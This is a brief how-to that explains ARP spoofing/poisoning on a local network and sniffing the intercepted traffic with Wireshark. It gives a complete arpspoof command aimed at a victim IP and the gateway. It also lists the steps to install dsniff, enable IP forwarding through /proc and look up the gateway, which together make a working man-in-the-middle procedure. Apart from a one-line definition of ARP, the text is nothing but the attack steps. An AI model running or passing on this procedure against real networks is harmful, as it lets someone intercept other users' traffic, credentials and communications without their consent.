Address Resolution Protocol (ARP) is a Data Link Layer protocol

start arp spoof/poisoning then open Wireshark (Ethereal) to sniff

arpspoof -i wlan0 -t 192.168.0.102 -r 192.168.0.1

  • -i is interface
  • -t victim machine
  • -r default gateway
to do this properly you need to follow the needed steps below
  1. install arpspoof

    port install dsniff
    port install dsniff-devel
    apt-get install dsniff

  2. for arp spoofing/poisoning we need to setup port forwarding

    echo 1 > /proc/sys/net/ipv4/ip_forward

  3. get default gateway

    ip route